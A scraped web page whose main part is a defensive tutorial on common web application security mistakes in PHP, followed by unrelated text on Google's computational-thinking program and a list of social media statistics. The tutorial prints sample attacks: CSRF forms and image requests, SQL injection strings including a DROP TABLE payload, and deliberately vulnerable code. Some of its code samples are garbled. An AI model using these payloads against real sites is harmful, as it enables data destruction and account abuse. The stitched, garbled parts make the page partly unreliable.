Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. Most commonly seen in the form of a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article, but take a close look at the other issues. To be more conformant with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Phishing, Shell injection and SQL injection. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.

[Offtopic: by the way, did you already get your copy of the Smashing Book?]

1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

view sourceprint?
1
2 echo "$user said $message";
3?>

To read the message in from the user, we’d have code like this:

view sourceprint?
1
2 $user = $_COOKIE['user'];
3 $message = $_REQUEST['message'];
4 if($message) {
5 save_message($user, $message);
6 }
7?>
8"text" name="message" value="">

This works only as long as the user sticks to messages in plain text, or perhaps a few safe HTML tags like or . We’re essentially trusting the user to only enter safe text. An attacker, though, may enter something like this:

view sourceprint?
1Hi there...

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message on their own page, they load bad-script.js into their page, and that script could do anything it wanted, for example, it could steal the contents of document.cookie, and then use that to impersonate the user and possibly send spam from their account, or more subtly, change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter contents that are safe to display on the page, we prevent this form of attack. We accomplish this using PHP’s input_filter extension.

We can change our PHP code to the following:

view sourceprint?
01
02 $user = filter_input(INPUT_COOKIE, 'user',
03 FILTER_SANITIZE_SPECIAL_CHARS);
04 $message = filter_input(INPUT_POST | INPUT_GET, 'message',
05 FILTER_SANITIZE_SPECIAL_CHARS);
06 if($message) {
07 save_message($user, $message);
08 }
09?>
10"text" name="message" value="">

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case may arise in the future, or a new programmer comes in to the project, and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side-effect of this is that if you have data that needs to be displayed in a non-web context (e.g. a mobile text message/pager message), then it may be unsuitably encoded. You may need further processing of the data before sending it to that context.

Now chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to just set the default filter to FILTER_SANITIZE_SPECIAL_CHARS by changing filter.default in your php.ini file.

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

view sourceprint?
1<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
2 style="position:absolute;left:-999em;">

Now all the attacker needs to do, is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

view sourceprint?
1<iframe name="pharma" style="display:none;">iframe>
2<form id="pform"
3 action="h++p://www.mybiz.com/post_message"
4 method="POST"
5 target="pharma">
6<input type="hidden" name="message" value="Cheap medicine at ...">
7form>
8<script>document.getElementById('pform').submit();script>

Which will POST the form back to www.mybiz.com.

The correct way to to protect against a CSRF is to use a single use token tied to the user. This token can only be issued to a signed in user, and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, this token needs to be validated. This ensures that the request originated from a page that we control. This token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

view sourceprint?
1
2function get_nonce() {
3 return md5($salt . ":" . $user . ":" . ceil(time()/86400));
4}
5?>

The timestamp we use is the current time to an accuracy of 1 day (86400 seconds), so it’s valid as long as the action is executed within a day of requesting the page. We could reduce that value for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.

An alternate method might be to generate the nonce without the timestamp, but store it as a session variable or in a server side database along with the time when the nonce was generated. That makes it harder for an attacker to generate the nonce by guessing the time when it was generated.

view sourceprint?
1
2function get_nonce() {
3 $nonce = md5($salt . ":" . $user);
4 $_SESSION['nonce'] = $nonce;
5 $_SESSION['nonce_time'] = time();
6 return $nonce;
7}
8?>

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

view sourceprint?
1
2 if(!verify_nonce($_POST['nonce'])) {
3 header("HTTP/1.1 403 Forbidden", true, 403);
4 exit();
5 }
6 // proceed normally
7?>

This protects us from the CSRF attack since the attacker’s website cannot generate our nonce.

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Now since we use a nonce, we’re protected against CSRF attacks, however, if the user is tricked into clicking the submit link themselves, then the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around such that the submit button is always under the user’s mouse. This was the technique used on the Facebook Like button click-jack attack.

Frame busting appears to be the most obvious way to protect against this, however it isn’t fool proof. For example, adding the security="restricted" attribute to an iframe will stop any frame busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

view sourceprint?
1<input type="text" name="message" value="">
2<input id="msg_btn" type="submit" disabled="true">
3<script type="text/javascript">
4if(top == self) {
5 document.getElementById("msg_btn").disabled=false;
6}
7script>

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will also be unable to click the submit button.

4. SQL injection

In this kind of an attack, the attacker exploits insufficient input validation to gain shell access on your database server. XKCD has a humorous take on SQL injection:

Sql in Common Security Mistakes in Web Applications
Full image (from xkcd)

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

view sourceprint?
01
02function save_message($user, $message)
03{
04 $sql = "INSERT INTO Messages (
05 user, message
06 ) VALUES (
07 '$user', '$message'
08 )";
09
10 return mysql_query($sql);
11}
12?>

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like

view sourceprint?
1test');DROP TABLE Messages;--

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

view sourceprint?
1test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

view sourceprint?
01
02function save_message($user, $message)
03{
04 // $dbh is a global database handle
05 global $dbh;
06
07 $stmt = $dbh->prepare('
08 INSERT INTO Messages (
09 user, message
10 ) VALUES (
11 ?, ?
12 )');
13 return $stmt->execute(array($user, $message));
14}
15?>

This protects us from SQL injection by correctly making sure that everything in $user goes into the user field and everything in $message goes into the message field even if it contains database meta characters.

There are cases where it’s hard to use prepared statements. For example, if you have a list of values in an IN clause. However, since our SQL statements are always generated by code, it is possible to first determine how many items need to go into the IN clause, and add as many ? placeholders instead.

5. Shell injection

Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example by using the system(), exec() or `` commands. There may be more functions depending on the language you use when building your web app.

The solution is the same for XSS attacks. You need to validate and sanitize all user inputs appropriately for where it will be used. For data that gets written back into an HTML page, we use PHP’s input_filter() function with the FILTER_SANITIZE_SPECIAL_CHARS flag. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist. Attackers find inventive ways of getting around a blacklist.

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it ensures that the user’s browser verifies that the page isn’t being redirected to a malicious site.
  2. Use one and only one URL for user log in, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when the user sees a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth based API. This is also known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

2
0

Over the past year, a group of California-credentialed teachers along with Google engineers came together to discuss and explore ideas about how to incorporate computational thinking into the K-12 curriculum to enhance student learning and build this critical 21st century skill in everyone.

What exactly is computational thinking? Well, that would depend on who you ask as there are several existing resources on the web that may define this term slightly differently. Google defines computational thinking (CT) as a set of skills that software engineers use to write the programs that underlay all of the computer applications you use every day. Specific CT techniques include:

  • Problem decomposition: the ability to break down a problem into sub-problems
  • Pattern recognition: the ability to notice similarities, differences, properties, or trends in data
  • Pattern generalization: the ability to extract out unnecessary details and generalize those that are necessary in order to define a concept or idea in general terms
  • Algorithm design: the ability to build a repeatable, step-by-step process to solve a particular problem

Given the increasing prevalence of technology in our day-to-day lives and in most careers outside of computer science, Google believes that it is important to raise this base level of understanding in everyone.

To this end, Google is introducing you to a new resource: Exploring Computational Thinking. Similar to some of our other initiatives in education, including CS4HS and Google Code University, this program is committed to providing educators with access to our curriculum models, resources, and communities to help them learn more about CT, discuss it as a strategy for teaching and understanding core curriculum, as well as easily incorporate CT into their own curriculum, whether it be in math, science, language, history or beyond. The materials developed by the team reflect both the teachers’ expertise in pedagogy and K-12 curriculum as well as our engineers’ problem-solving techniques that are critical to the tech industry.

Prior to launching this program, Google reached out to several educators and classrooms and had them try our materials. Here’s some of the feedback they received:

  • CT as a strategy for teaching and student learning works well with many subjects, and can easily be incorporated to support the existing K-12 curriculum
  • Models help to call out the specific CT techniques and provide more structure around the topics taught by educators, many of who were already unknowingly applying CT in their classrooms
  • Including programming exercises in the classroom can significantly enrich a lesson by both challenging the advanced students and motivating the students who have fallen behind
  • Google’s examples provide educators with a means of re-teaching topics that students have struggled with in the past, without simply going through the same lesson that frustrated them before

To learn more about the program or access CT curriculum materials and other resources, visit www.google.com/edu/ect.

It’s not hard to find some general facts and figures about the 5 most popular social media networks. A quick Google search yields a plethora of information thanks to Wikipedia and other related sites. Heck, there’s even a movie coming out about the origin of Facebook.

But what about the less well-known facts about the social networks we know and love (and hate)? Thanks to Danny Brown, we now know much more about each of the top 5 social networks. The list includes interesting and even mind-boggling facts about Twitter, Facebook, LinkedIn, YouTube, and RSS.

What’s your favorite fact? Do you know something not on this list? Let us know in the comments or on Twitter by mentioning @edudemic. The miracle of social networking…

Facebook

1. The average Facebook user has 130 friends.
2. More than 25 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) is shared each month.
3. Over 300,000 users helped translate the site through the translations application.
4. More than 150 million people engage with Facebook on external websites every month.
5. Two-thirds of comScore’s U.S. Top 100 websites and half of comScore’s Global Top 100 websites have integrated with Facebook.
6. There are more than 100 million active users currently accessing Facebook through their mobile devices.
7. People that access Facebook via mobile are twice as active than non-mobile users (think about that when designing your Facebook page).
8. The average Facebook user is connected to 60 pages, groups and events.
9. People spend over 500 billion minutes per month on Facebook.
10. There are more than 1 million entrepreneurs and developers from 180 countries on Facebook.

Statistics from Facebook press office.

Twitter

11. Twitter’s web platform only accounts for a quarter of its users – 75% use third-party apps.
12. Twitter gets more than 300,000 new users every day.
13. There are currently 110 million users of Twitter’s services.
14. Twitter receives 180 million unique visits each month.
15. There are more than 600 million searches on Twitter every day.
16. Twitter started as a simple SMS-text service.
17. Over 60% of Twitter use is outside the U.S.
18. There are more than 50,000 third-party apps for Twitter.
19. Twitter has donated access to all of its tweets to the Library of Congress for research and preservation.
20. More than a third of users access Twitter via their mobile phone.

Statistics from Twitter and the Chirp Conference.

LinkedIn

21. LinkedIn is the oldest of the four sites in this post, having been created on May 5 2003.
22. There are more than 70 million users worldwide.
23. Members of LinkedIn come from more than 200 countries from every continent.
24. LinkedIn is available in six native languages – English, French, German, Italian, Portuguese and Spanish.
25. Oracle’s Chief Financial Officer, Jeff Epstein, was headhunted for the position via his LinkedIn profile.
26. 80% of companies use LinkedIn as a recruitment tool.
27. A new member joins LinkedIn every second.
28. LinkedIn receives almost 12 million unique visitors per day.
29. Executives from all Fortune 500 companies are on LinkedIn.
30. Recruiters account for 1-in-20 LinkedIn profiles.

Statistics from LinkedIn press centre and SysComm International.

YouTube

31. The very first video uploaded was called “Me at the Zoo”, on 23rd April 2005.
32. By June 2006, more than 65,000 videos were being uploaded every day.
33. YouTube receives more than 2 billion viewers per day.
34. Every minute, 24 hours of video is uploaded to YouTube.
35. The U.S. accounts for 70% of YouTube users.
36. Over half of YouTube’s users are under 20 years old.
37. You would need to live for around 1,000 years to watch all the videos currently on YouTube.
38. YouTube is available in 19 countries and 12 languages.
39. Music videos account for 20% of uploads.
40. YouTube uses the same amount of bandwidth as the entire Internet used in 2000.

Statistics from YouTube press centre.

Blogging

41. 77% of Internet users read blogs.
42. There are currently 133 million blogs listed on leading blog directory Technorati.
43. 60% of bloggers are between the ages 18-44.
44. One in five bloggers update their blogs daily.
45. Two thirds of bloggers are male.
46. Corporate blogging accounts for 14% of blogs.
47. 15% of bloggers spend 10 hours a week blogging.
48. More than half of all bloggers are married and/or parents.
49. More than 50% of bloggers have more than one blog.
50. Bloggers use an average of five different social sites to drive traffic to their blog.